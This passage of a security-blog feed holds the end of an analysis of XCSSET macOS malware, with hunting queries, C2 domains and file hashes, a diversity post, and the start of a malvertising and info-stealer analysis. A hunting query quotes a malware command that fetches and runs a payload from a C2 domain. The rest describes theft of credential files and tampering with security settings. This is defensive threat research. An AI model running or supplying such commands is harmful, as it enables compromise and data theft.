If the module doesn’t find the pre-commit file, it creates the file and writes the payload within it. The process for generating the payload is similar to the zshrc and Dock persistence techniques discussed in the previous sections of this blog. This persistence method ensures the execution of the payload upon each commit action in the project.

File/Data exfiltration modules assessed to be in development uhsoxtfd_vostfd (Directory uploader)

This module is designed to exfiltrate files from a specified target folder. It appears to be in the development phase as of this writing because the specified target folder is currently set to ~/Desktop/test.

This module first verifies the existence of the target folder and exits if it can’t find the said folder. Otherwise, it lists the folder’s contents to test access permissions. If access is denied, the module runs a recursive loop to reset the TCC database for directories such as Desktop, Downloads, and Documents.

Once folder access is granted, the module archives the folder, excluding certain files such as links, patterns listed in the exclusion list, and files exceeding a specified size. It then uploads the created archive to a C2 server. Once the exfiltration is complete, the module deletes the archive.

fpfb (Directory listing)

This module runs a predefined command and uploads the result of the said command back to the C2 server. Currently, the command is set to “ls -la ~/Desktop”, which lists the files and directories in the user’s Desktop folder.

vectfd (Specific files exfiltration)

This module retrieves files that match the pattern defined in the INAME_QUERY variable within the user’s home directory. Currently, it searches for files with the pattern “*test.txt,” which indicates that the module might be under development. It also excludes files located in certain directories and files that exceed its size restrictions. The module then creates an archive of the files it retrieves, sends the archive to a C2 server, and deletes the archive.

Mitigation and protection guidance

Defenders can take the following mitigation steps to defend against this threat:

  • Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
  • Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
  • Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
  • Use Microsoft Defender for Endpoint on Mac, which detects, stops, and quarantines the malware discussed in this blog

Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:

  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
  • Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

  • Trojan:MacOS/XCSSET.SC
  • Trojan:MacOS/XCSSET.SE
  • Trojan:MacOS/XCSSET.ST

Defender Antivirus detects multiple sub-modules of this threat as the following:

  • Trojan:MacOS/XCCSET.SE
  • Trojan:MacOS/XCCSET.SF
  • Trojan:MacOS/XCCSET.SG
  • Trojan:MacOS/XCCSET.SI
  • Trojan:MacOS/XCCSET.SJ

Defender Antivirus also detects the following specific modules of this threat:

  • Trojan:MacOS/XCCSET.SK – dfhsebxzod
  • Trojan:MacOS/XCCSET.SH – fpzfcieoci
  • Trojan:MacOS/XCCSET.SD – hfdieiz
Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Possible XCSSET activity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

  • Suspicious script launched
  • System information discovery
  • Network connection by osascript
  • Possible content exfiltration
  • Suspicious file or content ingress
Hunting queries Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Suspicious commands while building an Xcode project

Search for suspicious commands related to this threat when an Xcode project is being built.

DeviceProcessEvents | where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh") | where InitiatingProcessFileName has_any ("sh", "bash", "zsh") | where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"

Suspicious payload patterns

Search for suspicious payload patterns related to this threat.

DeviceProcessEvents | where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh") | where InitiatingProcessFileName has_any ("sh", "bash", "zsh") Microsoft Sentinel 

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

Search for command lines making first contact to C2 server or for command lines stopping Xcode, Terminal, or Finder applications:

union DeviceFileEvents, DeviceProcessEvents | where Timestamp >= ago(90d) | where ProcessCommandLine contains 'curl -fskL -d "https://bulknames.ru/a" | sh >/dev/null 2>&1 &' or ProcessCommandLine has "ps aux | grep -E '/Applications/(SimulatorTrampoline|Terminal|Finder).app' | grep -v grep | awk '{print $2}' | xargs kill -9 &/dev/null || true"

Check for communications with network indicators of compromise (IOCs):

let c2cdomains = dynamic(["bulknames.ru","castlenet.ru","chaoping.ru","devapple.ru", "gigacells.ru","gizmodoc.ru","trixmate.ru","itoyads.ru","rigglejoy.ru","rutornet.ru", "sigmate.ru","vivatads.ru","figmasol.ru"]); DeviceNetworkEvents | where RemoteUrl in (c2cdomains) | project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort,RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Check for infected file or script IOCs:

let selectedTimestamp = datetime(2025-01-01T00:00:00.0000000Z); let FileSHA256 = dynamic(["d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f","56670f51f94080f1ae45f2a433767f210f290835bf582e1a2e1876f1028832de",” f67e2a27f0d1a4667b065ab05f884ff881eb7627e9d458f97f2204647b339c6e” "","25d226d5cb0c74ed5b1b85f12d53a4c2de2147ff464b2a35db03987015b11e24", "c2a7970216576a6b8f74528ffcfa51aa2b72b7f3e4237d97715b1b5ba80b25ca","8cec3c106659709017bb253becf68296c7bf13e76fa92b4450c281003d225645", "ea90c72e67f1c9a9231732119576a7dcb29471f7da428866187d4326e78097f2","ff83f53a383ba3f1d6b002006adf16a7f0b3263185d56cb70104889874d67c5d","cc37a01d3351b3c166f04aec6f52849e909b0b9c8d55095d730c660691b1ba66"]); search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator) TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from January 1st runs the search for 90 days, change the selectedTimestamp above or 90d accordingly. and (SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256)) Indicators of compromise IndicatorTypeDescriptionbulknames[.]ruDomainC2 servercastlenet[.]ruDomainC2 serverchaoping[.]ruDomainC2 serverdevapple[.]ruDomainC2 servergigacells[.]ruDomainC2 servergizmodoc[.]ruDomainC2 servertrixmate[.]ruDomainC2 serveritoyads[.]ruDomainC2 serverrigglejoy[.]ruDomainC2 serverrutornet[.]ruDomainC2 serversigmate[.]ruDomainC2 servervivatads[.]ruDomainC2 serverfigmasol[.]ruDomainC2 server~/Library/Caches/com.apple.finderFile pathA fake Launchpad application is created in this directory/Applications/SimulatorTrampoline.appFile pathLauncher application that runs additional modules found under the finderModules list/Applications/Reminders.appFile pathFake Reminders application/Applications/Reminders.app/Notes/File pathDirectory where the malware stores the stolen notes from the Notes application/Applications/Terminal.appFile pathLauncher application that runs additional modules found under the finderModules list/Applications/Finder.appFIle pathLauncher application that runs additional modules found under the finderModules listd338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02fSHA-256tmp/b or looz (fourth-stage payload)56670f51f94080f1ae45f2a433767f210f290835bf582e1a2e1876f1028832deSHA-256/tmp/.n (JavaScript payload)f67e2a27f0d1a4667b065ab05f884ff881eb7627e9d458f97f2204647b339c6eSHA-256dfhsebxzod module (infects Xcode projects)  25d226d5cb0c74ed5b1b85f12d53a4c2de2147ff464b2a35db03987015b11e24SHA-256jez module (establishes persistence through Git commits)c2a7970216576a6b8f74528ffcfa51aa2b72b7f3e4237d97715b1b5ba80b25caSHA-256uhsoxtfd_vostfd module (directory uploader)8cec3c106659709017bb253becf68296c7bf13e76fa92b4450c281003d225645SHA-256fpfb module (directory listing)ea90c72e67f1c9a9231732119576a7dcb29471f7da428866187d4326e78097f2SHA-256vectfd module (specific files exfiltration)ff83f53a383ba3f1d6b002006adf16a7f0b3263185d56cb70104889874d67c5dSHA-256p (Dock persistence payload)cc37a01d3351b3c166f04aec6f52849e909b0b9c8d55095d730c660691b1ba66SHA-256.zshrc_aliases file MITRE ATT&CK techniques observed Technique IDTechnique nameT1195.001Supply Chain Compromise: Compromise Software Dependencies and Development ToolsT1059.002Command and Scripting Interpreter: AppleScriptT1059.007Command and Scripting Interpreter: JavaScriptT1059.004Command and Scripting Interpreter: Unix ShellT1546.004Event Triggered Execution: Unix Shell Configuration ModificationT1560Archive Collected DataT1005Data from Local SystemT1041Exfiltration Over C2 ChannelT1083File and Directory DiscoveryT1222.002File and Directory Permissions Modification: Linux and Mac File and Directory Permissions ModificationT1564.001Hide Artifacts: Hidden Files and DirectoriesT1105Ingress Tool TransferT1036.005Masquerading: Match Legitimate Name or LocationT1647Plist File ModificationT1518Software DiscoveryT1082System Information DiscoveryT1614.001System Location Discovery: System Language DiscoveryT1548.006Abuse Elevation Control Mechanism: TCC ManipulationT1140Deobfuscate/Decode Files or InformationT1564.003Hide Artifacts: Hidden WindowT1070.004Indicator Removal: File DeletionT1027.004Obfuscated Files or Information: Compile After DeliveryT1027.013Obfuscated Files or Information: Encrypted/Encoded FileT1217Browser Information DiscoveryT1518.001Software Discovery: Security Software DiscoveryT1033System Owner/User Discovery References Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects appeared first on Microsoft Security Blog.

Categories: Microsoft

Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before

Microsoft Malware Protection Center - Thu, 03/06/2025 - 4:00pm

This Women’s History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers and am grateful to have so many allies who have extended their hands to help guide and shape me to the person I am today.  

Just last week I was in Tokyo for the Japan Security Forum, where Miki Tsusaka, the President of Microsoft Japan and I had a great conversation during a CyberWomen Asia fireside chat about the importance of women in cybersecurity. Following the chat was a panel discussion with Tsutaki-san, Security leader at Yamaha Motor Corporation and Debbie Furtado, one of our bright Principal group engineering managers. The event highlighted our different perspectives and talents which are invaluable to drive innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this promotes business growth, strengthens global defenses, and enhances AI safety. 

According to the World Economic Forum, gender equality in entrepreneurship drives economic growth and innovation.1 McKinsey and Company has also observed that closing the gender gap in employment and entrepreneurship could increase global GDP by 20%, and that organizations with 30% or more women on executive teams are 27% more likely to achieve higher profitability.2  

For a better future we need everyone in the journey and this is particularly of significance in cybersecurity where we face a critical shortage of talent and where cyberthreat actors are from diverse backgrounds.  

Cybersecurity Awareness

Empower everyone to be a cyber defender with resources and training curated by the security experts at Microsoft.

Learn more Addressing the skills gap in cybersecurity and AI

There is a significant talent gap in cybersecurity. The 2024 ISC2 Cybersecurity Workforce Study reports a global shortage of 4.7 million skilled workers.3 This worker shortage has been a significant challenge the past 12 months and is expected to continue for the next two years. To address this growing concern, we must embrace a wide range of perspectives and backgrounds to foster innovation and find more effective solutions to these challenges.   

By incorporating individuals with varied perspectives, experiences, and approaches within the cybersecurity workforce, we can enhance problem-solving capabilities and enhance strategic defenses.   

Cybercriminals come from various cultures and backgrounds, bringing different perspectives. Security professionals with varied backgrounds and perspectives can provide creative approaches and unique insights to counter these cyberthreats.  Likewise, for AI, having different backgrounds and perspectives help with AI safety and biases. 

Continue to deepen expertise and invite different perspectives

While progress has been made in creating opportunities for women in cybersecurity, significant work remains to remove entry barriers. It is essential to continue our efforts to improve representation in cybersecurity by creating new pathways and gaining support from more allies. I wholeheartedly encourage you to actively contribute to this objective through the many organizations and programs available and by doing the following: 

  • Share the accomplishments of meaningful role models with a wide range of experiences and perspectives. 
  • Adjust job requirements to remove potential biases. 
  • Offer inclusive training that encourages professionals, particularly those in their early careers, and encourage them to advance their skills in cybersecurity. 
  • Volunteer for educational programs that include cybersecurity and AI training. 
  • Reach out to community groups that advocate for mentorship opportunities. 
  • Act as an ally and create opportunities for those interested in cybersecurity careers, such as by encouraging them to participate and speak up and introducing them to peers. 

Security should be for all and we are all in this together. Together, we can enhance the global security workforce and contribute to a promising future.  

Register for our upcoming panel “Harnessing Diversity – Strengthening the Cybersecurity Workforce in the Age of AI” and visit Microsoft’s cybersecurity awareness page for resources and training provided by Microsoft security experts, enabling everyone in your organization to become a cyber defender. Let us all acknowledge the importance of diversity in cybersecurity and its critical role in safeguarding our future and shaping a history we can be proud of. 

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Advancing gender parity in entrepreneurship: strategies for a more equitable future, World Economic Forum. January 20, 2025.

2Diversity matters even more: The case for holistic impact, McKinsey and Company. December 5, 2023.

32024 ISC2 Cybersecurity Workforce Study, ISC2. October 31, 2024.

The post Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog.

Categories: Microsoft

Malvertising campaign leads to info stealers hosted on GitHub

Microsoft Malware Protection Center - Thu, 03/06/2025 - 12:00pm

In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.

Learn more about this malvertising campaign's multi-stage attack chain

Listen to the Microsoft Threat Intelligence podcast

GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.

The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.

In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.

We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.

GitHub activity and redirection chain

Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.

Multiple stages of malware were deployed in this campaign, as listed below, and the several different stages of activity that occurred depended on the payload dropped during the second stage.

  • The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.
  • The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.
  • Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.

The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an iframe on illegal streaming websites.

Figure 1. Code from website of streaming video and iframe showing malvertising redirector URL

There were several redirections that occurred before arriving at the malicious content stored on GitHub.

Figure 2. Redirection chain from pirate streaming website to malware files on GitHub Attack chain

Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user’s device and functioned as a dropper for additional payload stages and running malicious code. The additional payloads included information stealers to collect system and browser information on the compromised device, of which most were either Lumma stealer or an updated version of Doenerium. Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and data exfiltration of user data and browser credentials.

After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows Startup folder.

Several stages of malicious activity to conduct deployment of additional malware, collections, and exfiltration of data to a C2 were observed. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:

Figure 3. General depiction of the four stages First-stage payload: Establishing a foothold on the host

During the first stage, a payload is dropped onto the user’s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.

Most of these initial payloads dropped the following legitimate files to leverage their functionality. These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.

File nameFunctionapp-64.7zThis is a compressed archive that stores the second-stage payload and additional dropped files.app.asarThis is an archive file specific to Electron applications, which are directly installed programs.d3dcompiler_47.dllThis file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications.elevate.exeThis file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft.ffmpeg.dllThis file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams.libEGL.dllThis file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games.libEGLESv2.dllThis file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games.LICENSES.chromium.htmlThis file could contain information about the system or browser.nsis7z.dllThis file is associated with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software.StdUtils.dllThis file is associated with the plugins for the NSIS.System.dllThis file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework.vk_swiftshader.dllThis file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API.vulkan-1.dllThis file is associated with applications that use the Vulkan Graphics API, such as games and graphics software.

Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.

Second-stage payload: System discovery, collection, and exfiltration

The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload’s file name.

This was accomplished by querying the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName for the Windows OS version and running commands, such as the echo command, to gather the device’s name (%COMPUTERNAME%) and domain name (%USERDOMAIN%).

System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.

Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device Third-stage payload: PowerShell and .exe binary

Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.

Third-stage .exe analysis

The second-stage payloads run the dropped third-stage executables using the command prompt (for example, cmd.exe  /d /s /c “”C:\Users\<user>\AppData\Local\Temp\ApproachAllan.exe””). The /c flag ensures that the command runs and exits quickly. When the third-stage .exe runs, it drops a command file (.cmd) and launches it using the command prompt (for example, “cmd.exe” /c copy Beauty Beauty.cmd && Beauty.cmd). The .cmd file performs several actions, such as running tasklist, to initiate the discovery of running programs. This is followed by the findstr to search for keywords associated with security software:

findstr keywordAssociated softwarewrsaWebroot SecureAnywhereopssvcQuick HealAvastUIAvast AntivirusAVGUIAVG AntivirusbdservicehostBitdefender AntivirusnsWscSvcNorton SecurityekrnESETSophosHealthSophos

The .cmd file also concatenates multiple files into one with a single character file name: “cmd /c copy /b ..\Verzeichnis + ..\Controlling + ..\Constitute + ..\Enjoyed + ..\Confusion + ..\Min +..\Statutory J”. This single character filename is used next.

Following this, the third-stage .exe produces an AutoIT v3 interpreter file that is renamed from the typical file name of AutoIt3.exe and uses a .com file extension. The .cmd file initiates the execution of the .com file against the single character binary (such as Briefly.com J). Note, most of the second-stage payloads follow this progression chain, and as mentioned a second-stage payload can also drop multiple executables, all following the same process. For example:

First stage

  • X-essentiApp.exe

Second stage

  • Ionixnignx.exe

Third stage

  • EverybodyViewing.exe
  • ReliefOrganizational.exe
  • InflationWinston.exe

Third-stage command files

  • Beauty.cmd
  • Possess.cmd
  • Villa.cmd

Fourth-stage AutoIT .com files

  • Alexandria.com
  • Kills.com
  • Briefly.com

We observed multiple .com files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One .com file, such as Alexandria.com, drops a .scr file (another renamed AutoIT interpreter), and a .js (JavaScript) file with the same name as the .scr file. The purpose of the JavaScript file is to ensure persistence by creating a .url internet shortcut that points to the JavaScript file and is placed in the Startup folder, ensuring that the .scr file executes when the .js file executes (through Wscript.exe) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The .scr file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.

Another .com file, such as affiliated.com, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, affiliated.com initiates network connections to Telegram, Let’s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.

The final observed .com file, such as Briefly.com, exhibits behavior similar to affiliated.com but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.

The order in which these .com files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. In many cases, the .com files also leverage LOLBAS like RegAsm.exe by dropping a legitimate file into the %TEMP% directory or injecting malicious code into it using NtAllocateVirtualMemory and SetThreadContext API function calls. RegAsm.exe is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the WH_KEYBOARD_LL hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.

Browser data files seen accessed:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\cookies.sqlite
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\formhistory.sqlite
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\key4.db
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\logins.json
  • \AppData\Local\Google\Chrome\User Data\Default\Web Data
  • \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • \AppData\Local\Microsoft\Edge\User Data\Default\Login Data

User data file paths seen accessed:

  • C:\\Users\<user>\\OneDrive
  • C:\\Users\<user>\\Documents
  • C:\\Users\<user>\\Downloads
Third-stage PowerShell analysis

If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct actions, such as use curl to download additional files like NetSupport from the C2, create persistence for the NetSupport RAT, and exfiltrate system information to C2 servers. To ensure no errors or the progress meter is displayed on the compromised device, the curl command is often used with the –silent option when downloading files from the C2. PowerShell is often configured to run without restrictions with the -ExecutionPolicy Bypass parameter.

As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device’s name to the C2 and downloads NetSupport RAT from the same C2.

  • Second-stage payload: Squarel.exe
  • PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
  • C2 domain: keikochio[.]com
  • NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995

In another case, a second-stage payload drops a PowerShell script, which connects to hxxps://ipinfo[.]io to gather the compromised device’s external-facing IP address. This information is sent to a Telegram chat, then drops presentationhost.exe (a renamed NetSupport binary) and remcmdstub.exe (NetSupport Command Manager) into the %TEMP% directory. Finally, the PowerShell script establishes persistence for presentationhost.exe by adding it to the auto-start extensibility points (ASEP) registry keys. When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device’s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches MSBuild.exe to enable Chrome remote debugging on a hidden desktop. Additionally, presentationhost.exe initiates remcmdstub.exe, which leverages iScrPaint.exe (iTop Screen Recorder) to run MSBuild.exe and access browser credential files for exfiltration. The iScrPaint.exe file also establishes persistence by placing a .lnk shortcut in the Windows Startup folder, ensuring it runs on system reboot.

  • Second-stage payload: Application.exe
  • PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64
  • C2: hxxp://5.10.250[.]240/fakeurl.htm

The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device’s name to the C2 server. It then changes the working directory to $env:APPDATA, before using Start-BitsTransfer to download NetSupport from the C2. To evade detection, it modifies system security settings forcing TLS1.2 for encrypted C2 communication. These files are extracted into a newly created WinLibraryClient directory under AppData and then are launched. The script establishes persistence for the client32.exe (NetSupport RAT) by modifying the ASEP registry. Client32.exe initiates C2 connections to hxxp://79.132.128[.]77/fakeurl.htm.

  • Second-stage payloads: SalmonSamurai.exe, LakerBaker.exe, and DisplayPhotoViewer.exe
  • PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6
  • C2 domain: stocktemplates[.]net

Additionally, one observed execution included registry enumeration of HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\ to identify installed applications and security software. It also queries the system’s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.

Fourth-stage PowerShell analysis

Depending on the .com file that ran (like Briefly.com), the renamed AutoIT file may drop a PowerShell script (SHA-256: 2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3). The obfuscated PowerShell code uses the Add-MpPreference cmdlet to modify Microsoft Defender to add in exclusion paths for Microsoft Defender, so the specified folders are not scanned.

Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender

The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. The PowerShell commands perform the following actions:

  • Sends a web request to hxxps://360[.]net and closes the response.
  • Sends a web request to hxxps://baidu[.]com and closes the response.
  • Downloads data from hxxps://klipcatepiu0[.]shop/int_clp_sha.txt using a web client.
  • Writes the downloaded data to a memory stream and saves it as a .zip file named null.zip (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the C:\Users\<Username>\AppData\Local\Temp directory.
Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen Microsoft Defender for Endpoint configuration
  • Ensure that tamper protection is enabled in Microsoft Defender for Endpoint. 
  • Enable network protection in Microsoft Defender for Endpoint. 
  • Turn on web protection.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.     
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.  
  • Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors. 
    • Block executable files from running unless they meet a prevalence, age, or trusted list criterion 
    • Block execution of potentially obfuscated scripts
    • Block JavaScript or VBScript from launching downloaded executable content
    • Block process creations originating from PSExec and WMI commands
    • Block credential stealing from the Windows local security authority subsystem 
    • Block use of copied or impersonated system tools
Strengthen operating environment configuration
